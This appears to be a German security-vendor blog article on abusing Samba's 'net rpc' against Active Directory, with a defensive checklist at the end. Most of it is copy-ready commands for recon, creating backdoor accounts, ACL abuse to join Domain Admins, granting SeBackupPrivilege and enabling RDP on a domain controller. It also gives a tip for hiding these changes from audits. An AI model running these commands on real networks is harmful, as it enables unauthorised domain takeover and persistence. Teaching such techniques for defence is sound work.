Was ist Net RPC?
Net RPC ist Teil der Samba-Suite auf Linux und erlaubt die Kommunikation mit Windows-Systemen über das SMB/RPC-Protokoll. Es gibt einer Linux-Maschine die Fähigkeit, mit Windows Domain Controllern zu sprechen und administrative Operationen durchzuführen.
Der große Vorteil für Angreifer: Funktioniert oft schon mit einfachen Domain-User-Credentials – ohne Admin-Rechte.
Voraussetzungen
Linux-System
z.B. Kali Linux mit Samba-Tools
Netzwerkzugriff
Verbindung zum Zielsystem/DC
Credentials
Benutzername + Passwort (optional)
Benutzer der Domain auflisten
Der erste Schritt jeder AD-Reconnaissance: Alle Domain-Benutzer auflisten. Das Ergebnis zeigt Service Accounts, potenzielle Zielkonten und den kritischen krbtgt-Account.
$net rpc user -U ignite.local/raj%'Password@1' -S 192.168.1.11
Angreifer nutzen das für: Password Spraying, Brute Force, Identifikation von Admin-Accounts und Golden Ticket Attacks über den krbtgt-Hash.
Neuen Domain-Benutzer anlegen
Mit Admin-Credentials lässt sich ein Backdoor-Account anlegen, der normale Remediation überlebt.
$net rpc user add kinjal 'Password@1' -U ignite.local/administrator%'Ignite@987' -S 192.168.1.11
Domain-Benutzer löschen
Backdoor-Accounts nach Einsatz wieder entfernen – oder gezielt Accounts sperren für Sabotage.
$net rpc user delete kinjal -U ignite.local/administrator%'Ignite@987' -S 192.168.1.11
Benutzerinformationen abfragen
Gruppenmitgliedschaften pro User abfragen – Accounts in Domain Admins, Backup Operators oder DnsAdmins werden sofort zu High-Priority-Zielen.
$net rpc user info sanjeet -U ignite.local/raj%'Password@1' -S 192.168.1.11
Passwort ändern (ACL-Missbrauch)
Wenn ForceChangePassword-Rechte fehlkonfiguriert sind, kann ein Standard-User fremde Passwörter zurücksetzen – ohne Admin-Rechte.
$net rpc user password yashika Password@987 -U ignite.local/raj%'Password@1' -S 192.168.1.11
Kritisch: ACL-Fehlkonfigurationen dieser Art gehören zu den häufigsten Schwachstellen in realen AD-Umgebungen.
Alle Domain-Gruppen auflisten
Der gesamte Gruppen-Katalog in einer Abfrage: Domain Admins, Enterprise Admins, Schema Admins, DnsAdmins, Backup Operators – die komplette Privilege Attack Surface.
$net rpc group -U ignite.local/raj%'Password@1' -S 192.168.1.11
Gruppen erstellen & löschen
Angreifer können getarnte Gruppen erstellen, um Berechtigungen unauffällig zu vergeben.
$net rpc group add sales -U ignite.local/administrator%'Ignite@987' -S 192.168.1.11
$net rpc group delete sales -U ignite.local/administrator%'Ignite@987' -S 192.168.1.11
Domain Admins – Mitglieder auflisten
Die kritischste Abfrage: Wer hat Domain-Admin-Rechte? Jeder Account hier ist ein direktes Ziel für Privilege Escalation.
$net rpc group members "Domain Admins" -U ignite.local/raj%'Password@1' -S 192.168.1.11
ACL-Abuse: Selbst zum Domain Admin machen
Durch fehlkonfigurierte AddMember-ACLs kann sich ein Standard-User selbst zum Domain Admin machen – und danach wieder entfernen, um Spuren zu verwischen.
$net rpc group addmem "Domain Admins" raj -U ignite.local/raj%'Password@1' -S 192.168.1.11
$net rpc group delmem "Domain Admins" raj -U ignite.local/raj%'Password@1' -S 192.168.1.11
OPSEC-Trick: Sich selbst hinzufügen, Zugriff sichern, dann wieder entfernen – viele Organisationen auditieren nur den aktuellen Mitgliederstand, nicht historische Änderungen.
Netzwerkfreigaben anzeigen
ADMIN$, C$, SYSVOL, NETLOGON – jede Freigabe ist ein potenzielles Einfallstor. SYSVOL enthält historisch GPP-Dateien mit reversibel verschlüsselten Passwörtern (MS14-025).
$net rpc share -U ignite.local/raj%'Password@1' -S 192.168.1.11
Windows-Privilegien enumerieren
SeBackupPrivilege, SeDebugPrivilege, SeImpersonatePrivilege – diese Privilegien sind Domain-Admin-Äquivalente und ermöglichen Credential Dumps, Token Impersonation und Rootkit-Installation.
$net rpc rights list -U ignite.local/raj%'Password@1' -S 192.168.1.11
$net rpc rights grant kinjal SeBackupPrivilege -U ignite.local/administrator%'Ignite@987' -S 192.168.1.11
Stealth-Persistenz: Ein Backdoor-Account mit SeBackupPrivilege ist ein Domain-Admin-Äquivalent, taucht aber nie in der Domain-Admins-Gruppe auf.
Remote Registry – RDP aktivieren
Über Remote Registry lassen sich SAM, SECURITY und SYSTEM-Hives lesen – und RDP auf dem Domain Controller aktivieren.
$net rpc registry enumerate 'HKLM' -U ignite.local/administrator%'Ignite@987' -S 192.168.1.11
$net rpc registry getvalue 'HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server' 'fDenyTSConnections' -U ignite.local/administrator%'Ignite@987' -S 192.168.1.11
$net rpc registry setvalue 'HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server' 'fDenyTSConnections' dword '0' -U ignite.local/administrator%'Ignite@987' -S 192.168.1.11
Game Over: Backdoor-Account + RDP auf dem DC = vollständiger, persistenter, interaktiver Zugriff auf das privilegierteste System im Netzwerk.
Hinweis: Patchen auf eigene Gefahr
Die hier gezeigten Befehle und Konfigurationen werden auf eigenes Risiko ausgeführt. Ein falscher Befehl kann Systeme destabilisieren, Daten beschädigen oder Dienste unerreichbar machen. Wenn ihr unsicher seid, was ihr tut, kontaktiert lieber einen erfahrenen Administrator oder unsere Wasacon-Experten – wir helfen schnell und professionell.
Schutzmaßnahmen
14-Zeichen-Passwörter + MFA
Für alle privilegierten Accounts
Protected Users Group
Credential Caching & Delegation verhindern
krbtgt-Rotation
Zweimal jährlich rotieren gegen Golden Tickets
ACL-Audits
BloodHound/PingCastle quartalsweise einsetzen
JIT-Privileged Access
Domain Admins auf Minimum beschränken
Privilegien auditieren
SeBackup/SeDebug als DA-Äquivalent behandeln
SYSVOL scannen
GPP cPassword-Felder sofort entfernen
RDP auf DCs deaktivieren
NLA erzwingen, auf Management-IPs beschränken
Remote Registry deaktivieren
Auf DCs standardmäßig abschalten
SIEM-Monitoring
Event IDs 4720, 4726, 4728, 4732, 4657 überwachen
NDR/EDR einsetzen
Defender for Identity oder äquivalente Lösung
Honeypot-Accounts
Fake-DA-Accounts als Frühwarnsystem
Fazit
Net RPC ist kein „Hacker-Tool" im klassischen Sinne – sondern ein legitimes Admin-Tool, das in den falschen Händen zur kompletten Netzwerk-Karte wird. Die demonstrierten Operationen bilden eine vollständige Angriffskette: Von der initialen Reconnaissance über Privilege Escalation bis zur Persistenz.
Key Takeaway: Die Kompromittierung eines einzigen Standard-Benutzerkontos kann zur vollständigen Domain-Übernahme führen – wenn fehlkonfigurierte ACLs, übermäßige Privilegien oder schwaches Monitoring vorhanden sind.
Ist dein Active Directory sicher?
Wir prüfen deine AD-Konfiguration auf genau diese Schwachstellen – bevor es ein Angreifer tut.
Wasacon in deiner Region
Häufig gestellte Fragen
Diskussion
0 Beiträge
IT-Budget Quick-Check
Wie viel sollte Ihr Unternehmen jährlich in IT investieren?
Risiko-Level: Mittel · Multiplikator: 1.2×
Richtwerte auf Basis von BSI/NIST/ENISA-Branchenbenchmarks. Keine verbindliche Empfehlung.
Das könnte Sie auch interessieren
IT-Sicherheitpm-energy gehackt? Qilin listet „Die Solarexperten“ aus Reesdorf im Darknet
Seit dem 9. August 2026 führt die Ransomware-Gruppe Qilin die pm-energy GmbH aus Reesdorf (Schleswig-Holstein) auf ihrer Leak-Seite. Was belegt ist, was Täterbehauptung bleibt – und warum Photovoltaik-Projektdaten besonders sensibel sind.
IT-SicherheitClausing Tiefbau gehackt? Qilin listet Osnabrücker Infrastruktur-Spezialisten im Darknet
Seit dem 8. August 2026 führt die Ransomware-Gruppe Qilin die Clausing GmbH Tiefbauunternehmen aus Osnabrück auf ihrer Darknet-Leak-Seite. Was belegt ist, was Täterbehauptung bleibt – und warum die digitalisierten Bauprozesse den Fall brisant machen.
IT-SicherheitThe Gentlemen listet INKA Group: Hinter der unscheinbaren Münchner Immobilienholding steckt ein weit größeres Firmengeflecht
Seit dem 7. August 2026 führt die Ransomware-Gruppe The Gentlemen die Münchner INKA Group GmbH & Co. KG als mutmaßliches Opfer. Register- und Konzerndaten zeigen ein verzweigtes Immobiliennetz – bis hin zur Hasen-Immobilien AG mit 230,5 Mio. € Bilanzsumme.
Haftungsausschluss: Die auf Wasacon bereitgestellten Inhalte dienen nur zu Informationszwecken. Wir garantieren nicht die Qualität, Genauigkeit oder Vollständigkeit der Informationen aus Drittquellen.

